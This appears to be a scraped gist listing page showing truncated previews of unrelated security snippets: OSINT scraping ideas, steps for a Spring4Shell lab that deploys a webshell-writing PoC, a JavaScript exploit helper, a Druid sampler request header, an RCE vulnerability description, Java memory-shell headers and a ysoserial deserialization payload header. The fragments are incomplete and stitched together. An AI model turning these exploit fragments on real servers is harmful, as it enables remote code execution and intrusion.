nil0x42's tips & tricks
- Scrape twitter account of all github followers of target user on GitHub
- Scrape twitter account of all stargazers of target project on GitHub
At this point, it is probably easier to just use something like this: https://github.com/reznok/Spring4Shell-POC | |
- clone https://spring.io/guides/gs/handling-form-submission/ | |
- you can skip right to gs-handling-form-submission/complete, no need to follow the tutorial | |
- modify it so that you can build a war file (https://www.baeldung.com/spring-boot-war-tomcat-deploy) | |
- install tomcat9 + java 11 (i did it on ubuntu 20.04) | |
- deploy the war file | |
- update the PoC (https://share.vx-underground.org/) to write the tomcatwar.jsp file to webapps/handling-form-submission instead of webapps/ROOT |
class Helpers { | |
constructor() { | |
this.buf = new ArrayBuffer(8); | |
this.f64 = new Float64Array(this.buf); | |
this.f32 = new Float32Array(this.buf); | |
this.u32 = new Uint32Array(this.buf); | |
this.u64 = new BigUint64Array(this.buf); | |
this.state = {}; | |
} |
public static Object evaluate(String expression) { | |
ExpressionFactory factory = new de.odysseus.el.ExpressionFactoryImpl(); | |
ELContext context = new de.odysseus.el.util.SimpleContext(); | |
ValueExpression e = factory.createValueExpression(context, expression, Object.class); | |
return e.getValue(context); | |
} |
POST /druid/indexer/v1/sampler HTTP/1.1 | |
Host: x.x.x.x:8888 | |
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 | |
Accept: application/json, text/plain, */* | |
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 | |
Content-Type: application/json | |
Content-Length: 1045 | |
Connection: close | |
Suggeted description | |
The WebControl in | |
RaspberryTortoise through 2012-10-28 is vulnerable to remote code execution via shell metacharacters in a URI. | |
The file nodejs/raspberryTortoise.js has no validation on the | |
parameter incomingString before passing it to the child_process.exec | |
function. | |
------------------------------------------ | |
[Additional Information] |
//Author:fnmsd | |
//Blog:https://blog.csdn.net/fnmsd | |
import javax.servlet.http.HttpServletRequest; | |
import javax.servlet.http.HttpServletResponse; | |
import java.lang.reflect.Field; | |
import java.util.HashSet; | |
import java.util.Scanner; | |
public class a { |
//Author:fnmsd | |
//Blog:https://blog.csdn.net/fnmsd | |
package aa; | |
import javax.servlet.http.HttpServletRequest; | |
import javax.servlet.http.HttpServletResponse; | |
import java.io.PrintWriter; | |
import java.lang.reflect.Field; | |
import java.lang.reflect.Modifier; | |
import java.util.HashSet; |
package ysoserial.payloads; | |
import com.mchange.lang.ByteUtils; | |
import org.apache.commons.collections.Transformer; | |
import org.apache.commons.collections.functors.ChainedTransformer; | |
import org.apache.commons.collections.functors.ConstantTransformer; | |
import org.apache.commons.collections.functors.InvokerTransformer; | |
import org.apache.commons.collections.keyvalue.TiedMapEntry; | |
import org.apache.commons.collections.map.LazyMap; | |
import ysoserial.payloads.annotation.Authors; |
#!/usr/bin/env python3 | |
import sys | |
import requests | |
import urllib3 | |
import json | |
import re | |
from types import SimpleNamespace as Namespace | |
from feedgen.feed import FeedGenerator | |
output = '' |